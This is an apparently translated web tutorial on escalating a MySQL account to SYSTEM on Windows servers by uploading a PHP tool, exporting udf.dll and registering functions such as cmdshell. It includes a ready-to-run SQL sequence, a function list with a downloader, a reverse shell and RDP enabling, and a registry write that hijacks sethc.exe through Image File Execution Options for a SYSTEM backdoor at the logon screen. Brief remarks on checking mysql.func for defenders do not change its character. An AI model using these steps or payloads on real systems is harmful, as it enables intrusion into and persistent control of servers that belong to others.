Application of udf.dll in PHP Privilege Escalation

Source: Internet
Author: User

I. Function: uses MySQL user-defined functions (UDFs) to turn a MySQL account into SYSTEM-level access on the host. To repeat: escalating privileges with a MySQL UDF exploits no overflow. It uses a documented feature of MySQL itself: CREATE FUNCTION ... SONAME loads a native library into the server process, and whatever that library does runs with the privileges of the MySQL service account.

II. Application scenarios:
1. The target system is Windows (Win2000, XP, Win2003).
2. You already hold a MySQL user account. That account must have the INSERT and DELETE privileges on the mysql database, because CREATE FUNCTION and DROP FUNCTION add and remove rows in the mysql.func table (see the MySQL documentation on UDFs).

III. Usage:
Step 1: Upload the PHP file to the target web server, open it, and enter your MySQL account details to connect.

Step 2: Once connected, export the DLL. The export path normally does not matter (the MySQL service usually has write access to any directory), but on later MySQL versions you must export the DLL to the system directory of the target machine (the Windows or system32 directory); otherwise the next step fails with the error "No paths allowed for shared library". Note that on current MySQL releases the server loads UDF libraries only from the directory named by the plugin_dir system variable, so check that variable before choosing an export path.

Step 3: Create the functions with SQL statements. Syntax: CREATE FUNCTION name RETURNS STRING SONAME 'exported DLL path', where name must be one of the functions listed in section IV. On later MySQL versions the DLL in this statement cannot be given with a full path; if you exported the DLL to the system directory in Step 2, omit the path and the command runs normally. Otherwise you get the error "Can't open shared library", and you must re-export the DLL to the system directory.

Step 4: Once a function has been created, call it from SQL like any built-in function. Syntax: SELECT name(parameter list). Each function takes different parameters; use the help function, created the same way, to obtain the parameter list of a given function.
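The four steps above issued directly as MySQL statements, as an added example that is not from the original article or from the PHP tool it describes. Assumed, and not stated in the source: the DLL was uploaded beside the PHP file as C:\inetpub\wwwroot\udf.dll, the account also holds the FILE privilege (needed for INTO DUMPFILE), and cmdshell takes a single command string. The example also shows the checks that tell you in advance which of the two errors from Steps 2 and 3 you would hit, and the table a defender inspects to find planted UDFs.

```sql
-- Added example (not from the original article or its PHP tool): Steps 1-4
-- as the MySQL statements the PHP page sends, plus pre-flight checks.
-- Assumed (not in the source): the DLL sits at C:\inetpub\wwwroot\udf.dll,
-- the account holds FILE, and cmdshell takes a single command string.

-- Preconditions: INSERT and DELETE on the mysql database (CREATE FUNCTION
-- and DROP FUNCTION write mysql.func) and FILE for the export below.
SHOW GRANTS;

-- Which loading rule applies? Old servers resolve SONAME through the OS
-- loader, so the Windows system directory works; later releases load only
-- from plugin_dir and reject any path in SONAME. secure_file_priv, when
-- set, restricts where INTO DUMPFILE may write.
SHOW VARIABLES LIKE 'version%';
SHOW VARIABLES LIKE 'plugin_dir';
SHOW VARIABLES LIKE 'secure_file_priv';

-- Step 2: export the DLL. INTO DUMPFILE writes the raw bytes with no row or
-- column formatting, which a binary needs. LOAD_FILE returns NULL if the
-- server cannot read the file or it exceeds max_allowed_packet, so check
-- the exported file size afterwards. Backslashes are doubled because MySQL
-- treats "\" in a string literal as an escape character.
SELECT LOAD_FILE('C:\\inetpub\\wwwroot\\udf.dll')
  INTO DUMPFILE 'C:\\Windows\\system32\\udf.dll';

-- Step 3: register the functions. Bare file name, no path. A path here
-- gives "No paths allowed for shared library" on later servers; a library
-- the server cannot locate gives "Can't open shared library".
CREATE FUNCTION cmdshell RETURNS STRING SONAME 'udf.dll';
CREATE FUNCTION regwrite RETURNS STRING SONAME 'udf.dll';

-- Registration persists across restarts in mysql.func; this is also the
-- table a defender queries to find UDFs nobody installed on purpose.
SELECT name, ret, dl FROM mysql.func;

-- Step 4: call the function like a built-in. The command runs under the
-- MySQL service account, which is what turns a database login into host
-- access.
SELECT cmdshell('whoami');

-- Clean-up. DROP FUNCTION removes only the mysql.func row; the DLL on disk
-- and anything cmdshell created remain for forensics to find.
DROP FUNCTION cmdshell;
DROP FUNCTION regwrite;
```

Run the statements one at a time from the PHP page or any MySQL client: each of the SHOW statements answers a question the later statements depend on, and the SELECT on mysql.func confirms the CREATE FUNCTION actually took before anything is executed.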

IV. Function Description:
Cmdshell: executes a cmd command;
Downloader: downloads the specified file from the network and saves it to the specified directory;
Open3389: enables the 3389 Terminal Services port; a custom port can be specified (no reboot is needed unless the port is changed);
Backshell: reverse (call-back) shell;
ProcessView: lists system processes;
KillProcess: terminates the specified process;
Regread: reads the registry;
Regwrite: writes the registry;
Shutdown: shuts down, logs off, or restarts the machine;
About: description and help for the functions;

Example of the registry write function. The statement below sets the Image File Execution Options debugger for sethc.exe (the Sticky Keys helper, which Windows starts as SYSTEM from the logon screen when Shift is pressed five times), so the attacker's executable is launched in its place. Backslashes are doubled because MySQL treats a single backslash in a string literal as an escape character:

SELECT regwrite("HKEY_LOCAL_MACHINE", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe", "Debugger", "REG_SZ", "E:\\web\\170stock\\admin\\include\\assumer.exe");
